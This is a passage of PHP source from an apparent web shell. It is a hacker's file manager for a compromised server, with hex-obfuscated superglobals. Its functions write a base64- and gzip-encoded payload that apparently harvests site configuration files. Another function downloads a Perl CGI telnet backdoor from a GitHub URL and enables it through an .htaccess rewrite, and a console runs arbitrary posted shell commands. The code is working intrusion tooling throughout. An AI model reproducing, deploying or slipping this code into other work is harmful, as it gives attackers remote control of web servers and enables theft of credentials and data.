$sort = ["name", 1];
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
if (preg_match("!s_([A-z]+)_(\d{1})!", ${"\x5F\x50\x4F\x53\x54"}["p1"], $match)) {
$sort = [$match[1], (int) $match[2]];
}
}
echo '<script>
function sa() { for(i=0;i<document.files.elements.length;i++) if(document.files.elements[i].type == \'checkbox\') document.files.elements[i].checked = document.files.elements[0].checked;
}
</script> <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post>';
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" .
($sort[1] ? 0 : 1) .
"\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" .
($sort[1] ? 0 : 1) .
"\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" .
($sort[1] ? 0 : 1) .
"\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" .
($sort[1] ? 0 : 1) .
"\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = [];
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"name" => $dirContent[$i],
"path" => $GLOBALS["cwd"] . $dirContent[$i],
"modify" => @date(
"Y-m-d H:i:s",
@filemtime($GLOBALS["cwd"] . $dirContent[$i])
),
"perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]),
"size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]),
"owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]),
"group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) {
$files[] = array_merge($tmp, ["type" => "file"]);
} elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) {
$links[] = array_merge($tmp, ["type" => "link"]);
} elseif (
@is_dir($GLOBALS["cwd"] . $dirContent[$i]) &&
$dirContent[$i] != "."
) {
$dirs[] = array_merge($tmp, ["type" => "dir"]);
}
}
$GLOBALS["sort"] = $sort;
function cmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp($a[$GLOBALS["sort"][0]], $b[$GLOBALS["sort"][0]]) *
($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) *
($GLOBALS["sort"][1] ? 1 : -1);
}
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach ($files as $f) {
echo "<tr" .
($l ? " class=l1" : "") .
'> <td><input type=checkbox name="f[]" value="' .
urlencode($f["name"]) .
'" class=chkbx></td> <td><a href=# onclick="' .
($f["type"] == "file"
? 'g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'view\')">' .
htmlspecialchars($f["name"])
: 'g(\'FilesMan\',\'' .
$f["path"] .
'\');"><b>[ ' .
htmlspecialchars($f["name"]) .
" ]</b>") .
'</a> <a href=# onclick="' .
(preg_match('/\.(zip|ZIP)$/', $f["name"])
? 'g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'unzip\')">' .
' <b style="background:green;text-shadow: 0px 0px 0px;">unzip</b>'
: 'g(\'FilesMan\',\'' . $f["path"] . '\');">') .
"</a></td> <td>" .
($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) .
"</td><td>" .
$f["modify"] .
"</td><td>" .
$f["owner"] .
"/" .
$f["group"] .
'</td><td><a href=# onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\',\'chmod\')">' .
$f["perms"] .
'</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'touch\')">T</a>' .
($f["type"] == "file"
? ' <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'download\')">D</a>'
: "") .
"</td></tr>";
$l = $l ? 0 : 1;
}
echo '<tr><td colspan=5> <input type=hidden name=a value=\'FilesMan\'> <input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"> <input type=hidden name=charset value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["charset"]) ? ${"\x5F\x50\x4F\x53\x54"}["charset"] : "") .
'">
<select name=\'p1\' style=\'height:25px;\'><option value=\'delete\'>Delete</option><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option>';
if (!empty($_SESSION["act"]) && @count($_SESSION["f"])) {
echo '<option value=\'paste\'>Paste</option>';
}
echo '</select> <input type="submit" value=">>"></td></tr> </form></table></div>';
printFooter();
}
function actionFilesTools()
{
if (isset(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
${"\x5F\x50\x4F\x53\x54"}["p1"] = urldecode(${"\x5F\x50\x4F\x53\x54"}["p1"]);
}
if (@${"\x5F\x50\x4F\x53\x54"}["p2"] == "download") {
if (is_file(${"\x5F\x50\x4F\x53\x54"}["p1"]) && is_readable(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
ob_start("ob_gzhandler", 4096);
header(
"Content-Disposition: attachment; filename=" .
basename(${"\x5F\x50\x4F\x53\x54"}["p1"])
);
if (${"\x66\x65\x78\x69\x73\x74\x73"}("mime_content_type")) {
$type = @mime_content_type(${"\x5F\x50\x4F\x53\x54"}["p1"]);
header("Content-Type: " . $type);
}
$fp = @fopen(${"\x5F\x50\x4F\x53\x54"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
} elseif (is_dir(${"\x5F\x50\x4F\x53\x54"}["p1"]) && is_readable(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
}
exit();
}
if (@${"\x5F\x50\x4F\x53\x54"}["p2"] == "mkfile") {
if (!file_exists(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
$fp = @fopen(${"\x5F\x50\x4F\x53\x54"}["p1"], "w");
if ($fp) {
${"\x5F\x50\x4F\x53\x54"}["p2"] = "edit";
fclose($fp);
}
}
}
printHeader();
echo "<h1>File Tools</h1><div class=content>";
if (!file_exists(@${"\x5F\x50\x4F\x53\x54"}["p1"])) {
echo "File not exists";
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner(${"\x5F\x50\x4F\x53\x54"}["p1"]));
$gid = @posix_getgrgid(@fileowner(${"\x5F\x50\x4F\x53\x54"}["p1"]));
echo "<span>Name:</span> " .
htmlspecialchars(${"\x5F\x50\x4F\x53\x54"}["p1"]) .
" <span>Size:</span> " .
(is_file(${"\x5F\x50\x4F\x53\x54"}["p1"]) ? viewSize(filesize(${"\x5F\x50\x4F\x53\x54"}["p1"])) : "-") .
" <span>Permission:</span> " .
viewPermsColor(${"\x5F\x50\x4F\x53\x54"}["p1"]) .
" <span>Owner/Group:</span> " .
$uid["name"] .
"/" .
$gid["name"] .
"<br>";
echo "<span>Create time:</span> " .
date("Y-m-d H:i:s", filectime(${"\x5F\x50\x4F\x53\x54"}["p1"])) .
" <span>Access time:</span> " .
date("Y-m-d H:i:s", fileatime(${"\x5F\x50\x4F\x53\x54"}["p1"])) .
" <span>Modify time:</span> " .
date("Y-m-d H:i:s", filemtime(${"\x5F\x50\x4F\x53\x54"}["p1"])) .
"<br><br>";
if (empty(${"\x5F\x50\x4F\x53\x54"}["p2"])) {
${"\x5F\x50\x4F\x53\x54"}["p2"] = "view";
}
if (is_file(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
$m = [
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch",
];
} else {
$m = ["Chmod", "Rename", "Touch"];
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,null,\'' .
strtolower($v) .
'\')">' .
(strtolower($v) == @${"\x5F\x50\x4F\x53\x54"}["p2"] ? "<b>[ " . $v . " ]</b>" : $v) .
"</a> ";
}
echo "<br><br>";
switch (${"\x5F\x50\x4F\x53\x54"}["p2"]) {
case "view":
echo "<pre class=ml1>";
$fp = @fopen(${"\x5F\x50\x4F\x53\x54"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</pre>";
break;
case "highlight":
if (is_readable(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
echo '<div class=ml1 style="background-color: black;color:black;">';
$code = highlight_file(${"\x5F\x50\x4F\x53\x54"}["p1"], true);
echo str_replace(
["<span ", "</span>"],
["<font ", "</font>"],
$code
) . "</div>";
}
break;
case "chmod":
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p3"])) {
$perms = 0;
for ($i = strlen(${"\x5F\x50\x4F\x53\x54"}["p3"]) - 1; $i >= 0; --$i) {
$perms +=
(int) ${"\x5F\x50\x4F\x53\x54"}["p3"][$i] *
pow(8, strlen(${"\x5F\x50\x4F\x53\x54"}["p3"]) - $i - 1);
}
if (!@chmod(${"\x5F\x50\x4F\x53\x54"}["p1"], $perms)) {
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
} else {
die('<script>g(null,null,null,null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="' .
substr(sprintf("%o", fileperms(${"\x5F\x50\x4F\x53\x54"}["p1"])), -4) .
'"><input type=submit value=">>"></form>';
break;
case "edit":
if (!is_writable(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
echo 'File isn\'t writeable';
break;
}
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p3"])) {
@file_put_contents(${"\x5F\x50\x4F\x53\x54"}["p1"], ${"\x5F\x50\x4F\x53\x54"}["p3"]);
echo 'Saved!<br><script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen(${"\x5F\x50\x4F\x53\x54"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case "hexdump":
$c = @file_get_contents(${"\x5F\x50\x4F\x53\x54"}["p1"]);
$n = 0;
$h = ["00000000<br>", "", ""];
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("%02X", ord($c[$i])) . " ";
switch (ord($c[$i])) {
case 0:
$h[2] .= " ";
break;
case 9:
$h[2] .= " ";
break;
case 10:
$h[2] .= " ";
break;
case 13:
$h[2] .= " ";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf("%08X", $i + 1) . "<br>";
}
$h[1] .= "<br>";
$h[2] .= "\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>' .
$h[0] .
"</pre></span></td><td bgcolor=#red><pre>" .
$h[1] .
"</pre></td><td bgcolor=#red><pre>" .
htmlspecialchars($h[2]) .
"</pre></td></tr></table>";
break;
case "rename":
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p3"])) {
if (!@rename(${"\x5F\x50\x4F\x53\x54"}["p1"], ${"\x5F\x50\x4F\x53\x54"}["p3"])) {
echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
} else {
die(
'<script>g(null,null,"' .
urlencode(${"\x5F\x50\x4F\x53\x54"}["p3"]) .
'",null,"")</script>'
);
}
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="' .
htmlspecialchars(${"\x5F\x50\x4F\x53\x54"}["p1"]) .
'"><input type=submit value=">>"></form>';
break;
case "touch":
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p3"])) {
$time = strtotime(${"\x5F\x50\x4F\x53\x54"}["p3"]);
if ($time) {
if (@touch(${"\x5F\x50\x4F\x53\x54"}["p1"], $time, $time)) {
die('<script>g(null,null,null,null,"")</script>');
} else {
echo 'Fail!<script>document.mf.p3.value="";</script>';
}
} else {
echo 'Bad time format!<script>document.mf.p3.value="";</script>';
}
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="' .
date("Y-m-d H:i:s", @filemtime(${"\x5F\x50\x4F\x53\x54"}["p1"])) .
'"><input type=submit value=">>"></form>';
break;
case "mkfile":
break;
case "unzip":
if (preg_match('/\.(zip|ZIP)$/', ${"\x5F\x50\x4F\x53\x54"}["p1"])) {
$GLOBALS["status"] = [];
$zip = new ZipArchive();
if ($zip->open(${"\x5F\x50\x4F\x53\x54"}["p1"]) === true) {
$zip->extractTo(htmlspecialchars($GLOBALS["cwd"]));
$zip->close();
$GLOBALS["status"] = [
"success" =>
'<b style="font-size: 20px;background:green;text-shadow: 0px 0px;">File unzipped successfully</b>',
];
} else {
$GLOBALS["status"] = [
"error" =>
'<b style="font-size: 20px;background:red;text-shadow: 0px 0px;">Error unzipping file</b>',
];
}
}
echo "<center>";
echo reset($GLOBALS["status"]);
echo "<br/></p></center>";
break;
}
echo "</div>";
printFooter();
}
function actionconfigs()
{
printHeader();
echo "<center><h1>Get Configs</h1></center><div class=content>";
@ini_set("display_errors", 0);
$cgi_dir = mkdir("configs", 0755);
chdir("configs");
$file_mass = "config.php";
$mass_script =
"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";
$mass = fopen($file_mass, "w");
fwrite($mass, gzinflate(base64_decode($mass_script)));
echo "<center> <iframe src='configs/config.php' width='900' frameborder='0' height='480'></iframe></a>";
echo "</div>";
printFooter();
}
function actionSafeMode()
{
printHeader();
echo "<center><h1>Cgi Telnet</h1><div class=content><center>";
$cgi_dir = mkdir("telnet", 0755);
chdir("telnet");
$file_cgi = "cgi.new";
$memeg = ".htaccess";
$isi_htcgi =
"OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .new \n AddHandler cgi-script .new \n AddHandler cgi-script .new";
$htcgi = fopen(".htaccess", "w");
fwrite($htcgi, $isi_htcgi);
$full = str_replace(${"\x5F\x53\x45\x52\x56\x45\x52"}["DOCUMENT_ROOT"], "", $dir);
function cgitelnet($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("cgi.new")) {
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
chmod($file_cgi, 0755);
chmod($memeg, 0755);
printFooter();
die();
} else {
if (
cgitelnet(
"https://raw.githubusercontent.com/leetpromax/cgitelnet/main/cgitelnet.pl",
"cgi.new"
)
) {
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
chmod($file_cgi, 0755);
chmod($memeg, 0755);
printFooter();
die();
} else {
echo "<center><font color=red>Failed to Create Cgi Telnet file</font></center>";
printFooter();
die();
}
}
chmod($file_cgi, 0755);
chmod($memeg, 0755);
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
printFooter();
}
function actionConsole()
{
if (isset(${"\x5F\x50\x4F\x53\x54"}["ajax"])) {
$_SESSION[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "ajax"] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv(
${"\x5F\x50\x4F\x53\x54"}["charset"],
"UTF-8",
addcslashes(
"\n$ " . ${"\x5F\x50\x4F\x53\x54"}["p1"] . "\n" . ex(${"\x5F\x50\x4F\x53\x54"}["p1"]),
"\n\r\t\\'\0"
)
);
if (preg_match("!.*cd\s+([^;]+)$!", ${"\x5F\x50\x4F\x53\x54"}["p1"], $match)) {
if (@chdir($match[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "document.mf.c.value='" . $GLOBALS["cwd"] . "';";
}
}
echo "document.cf.output.value+='" . $temp . "';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit();
}
printHeader();
echo '<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(""); var cur = 0;
function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur];
else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur];
else
cur--;
} }function add(cmd) { cmds.pop();
